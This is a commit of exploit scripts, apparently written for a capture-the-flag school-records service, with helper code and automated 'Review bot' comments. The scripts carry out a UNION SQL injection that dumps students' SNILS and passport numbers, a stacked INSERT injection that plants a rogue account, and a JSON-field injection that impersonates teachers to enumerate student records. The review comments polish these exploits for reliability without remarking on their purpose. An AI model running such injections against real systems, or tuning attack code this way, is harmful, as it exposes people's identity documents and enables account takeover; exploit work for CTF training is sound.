init here

2025-11-26 21:32:41 +03:00
commit 33c97acade
91 changed files with 9155 additions and 0 deletions


@@ -0,0 +1,38 @@
#!/usr/bin/env python3
import socket
import common
credentials = common.register_random_teacher()
headers = common.get_auth_headers(credentials)
class_id = common.create_class(credentials)
injection = (
"01%2F01%2F2077' "
"' UNION SELECT id AS id, user_id AS class_id, snils AS date, "
"passport AS title, 'gotcha' AS homework FROM students "
"WHERE '-1' = '-1"
)
path = f"/api/classes/{class_id}/lessons/{injection}"
url = common.BASE + path
s = socket.create_connection((common.HOST, common.PORT))
s.sendall(f"""GET {path} HTTP/1.1
Authorization: {headers["Authorization"]}
""".encode("utf-8"))
chunks = []
while True:
data = s.recv(4096)
if not data:
break
chunks.append(data)
body = b"".join(chunks).decode("utf-8")
print(body)
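Review bot: The socket created at `s = socket.create_connection((common.HOST, common.PORT))` is never closed, and the `while True` / `s.recv(4096)` loop has no timeout, so it only returns when the peer closes the connection and otherwise blocks the script indefinitely. Wrapping the connection in `with socket.create_connection((common.HOST, common.PORT)) as s:` and calling `s.settimeout(5)` before the loop bounds both the resource and the wait. The third file section (the `/api/students?учитель=` script) repeats the same pattern and should get the same treatment. Whether the request string already ends in the blank line HTTP requires cannot be told from this rendered page, since blank lines appear to have been dropped (the hunk header counts 38 lines but fewer are shown).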


@@ -0,0 +1,38 @@
#!/usr/bin/env python3
import requests
import common
injection_first_name = common.random_string()
injection_last_name = common.random_string()
injection_password = common.random_string()
injection_username = f"{injection_first_name}.{injection_last_name}"
legit_first_name = common.random_string()
legit_last_name = common.random_string()
legit_password = common.random_string()
legit_username = f"{legit_first_name}.{legit_last_name}"
legit_education = (
"Pony', ''); INSERT INTO users (first_name, last_name, middle_name, "
"username, password) "
f"VALUES ('{injection_first_name}', '{injection_last_name}', "
f"'Injectionovich', '{injection_username}', "
f"'{injection_password}'); --"
)
common.register_teacher(
legit_first_name,
legit_last_name,
legit_password,
legit_username,
legit_education,
)
last_student_id = common.create_student((legit_username, legit_password))
headers = common.get_auth_headers((injection_username, injection_password))
for student_id in range(max(1, last_student_id - 100), last_student_id):
url = f"{common.BASE}/api/students/{student_id}"
response = requests.get(url, headers=headers)
print(response.text)
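Review bot: `response = requests.get(url, headers=headers)` inside the `for student_id` loop has no `timeout`, so one stalled response blocks the remaining hundred requests, and the status code is never inspected before `response.text` is printed, so 401/404 bodies are indistinguishable from real records in the output. `response = requests.get(url, headers=headers, timeout=5)` followed by `print(response.status_code, response.text)` would bound the wait and make the output interpretable. The lower bound `max(1, last_student_id - 100)` silently assumes identifiers are dense integers starting at 1; a comment stating that assumption would help whoever adapts the range later.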


@@ -0,0 +1,44 @@
#!/usr/bin/env python3
import socket
import common
first_name = common.random_string()
last_name = common.random_string()
password = common.random_string()
username = f"{first_name}.{last_name}"
_, _, base_teacher_id = common.register_random_teacher()
common.register_teacher(
first_name,
last_name,
password,
username,
middle_name="""Injectionovich", "id": 228, "kek": "pek"""
)
for teacher_id in range(max(1, base_teacher_id - 100), base_teacher_id):
path = f"/api/students?учитель={teacher_id}"
headers = common.get_auth_headers((username, password))
s = socket.create_connection((common.HOST, common.PORT))
s.sendall(f"""GET {path} HTTP/1.1
Authorization: {headers["Authorization"]}
""".encode("utf-8"))
chunks = []
while True:
data = s.recv(4096)
if not data:
break
chunks.append(data)
body = b"".join(chunks).decode("utf-8")
print(body)
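Review bot: `headers = common.get_auth_headers((username, password))` is recomputed on every iteration of the `for teacher_id` loop although it does not depend on `teacher_id`; hoisting it above the loop removes a redundant call per request. The request-target built in `path` contains the non-ASCII query key `учитель` and is written to the socket as raw UTF-8 bytes; HTTP request-targets are normally percent-encoded, so either `urllib.parse.quote(path, safe="/?=")` or a one-line comment stating that the raw bytes are deliberate should document the choice. The socket opened per iteration is never closed and the `recv` loop has no timeout, the same issue noted on the first file section.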

118
sploits/common/__init__.py Normal file

@@ -0,0 +1,118 @@
import json
import random
import sys
import requests
HOST = sys.argv[1]
PORT = 1337
BASE = f"http://{HOST}:{PORT}"
def random_string(length=8):
letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
return ''.join(random.choice(letters) for _ in range(length))
def register_teacher(
first_name,
last_name,
password,
username,
education="Pony",
middle_name="Автотестович",
):
url = f"{BASE}/api/users"
data = {
"имя": first_name,
"фамилия": last_name,
"отчество": middle_name,
"образование": education,
"пароль": password,
"повтор пароля": password,
}
response = requests.post(url, data=json.dumps(data, ensure_ascii=False))
if response.status_code != 201:
print(
f"Failed to register teacher: {response.status_code} "
f"{response.text}"
)
sys.exit(1)
data = response.json()
return (username, password, data["идентификатор"])
def register_random_teacher():
first_name = random_string()
last_name = random_string()
password = random_string()
username = f"{first_name}.{last_name}"
return register_teacher(first_name, last_name, password, username)
def create_class(teacher_credentials):
headers = get_auth_headers(teacher_credentials)
url = f"{BASE}/api/classes"
data = {
"номер": 11,
"буква": "Б",
}
response = requests.post(
url,
data=json.dumps(data, ensure_ascii=False),
headers=headers
)
if response.status_code != 201:
print(
f"Failed to create class: {response.status_code} {response.text}"
)
sys.exit(1)
class_info = response.json()
return class_info["идентификатор"]
def create_student(teacher_credentials):
headers = get_auth_headers(teacher_credentials)
password = random_string()
url = f"{BASE}/api/students"
data = {
"имя": random_string(),
"фамилия": random_string(),
"отчество": "Автотестович",
"снилс": random_string(),
"паспорт": random_string(),
"пароль": password,
"повтор пароля": password,
}
response = requests.post(
url,
data=json.dumps(data, ensure_ascii=False),
headers=headers
)
if response.status_code != 201:
print(
f"Failed to create student: {response.status_code} {response.text}"
)
sys.exit(1)
class_info = response.json()
return class_info["идентификатор"]
def get_auth_headers(teacher_credentials):
return {
"Authorization": (
f"Basic {teacher_credentials[0]} {teacher_credentials[1]}"
)
}
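Review bot: `HOST = sys.argv[1]` executes at import time, so importing `common` without a positional argument (a test, an interactive session) fails with an uncaught IndexError instead of a usage message; a guard such as `if len(sys.argv) < 2: sys.exit("usage: <script> HOST")` placed before the assignment gives a clear failure. Every helper in the module calls `sys.exit(1)` on a non-201 response, which makes them unusable as library functions; raising an exception and letting the calling script decide is the conventional split. `register_teacher` accepts `username` but never puts it in the request body, it only echoes it back in the returned tuple, and a docstring should say so that callers do not assume the server received it. In `create_student` the parsed response is bound to `class_info`, a name copied from `create_class`; `student_info` would match what it holds.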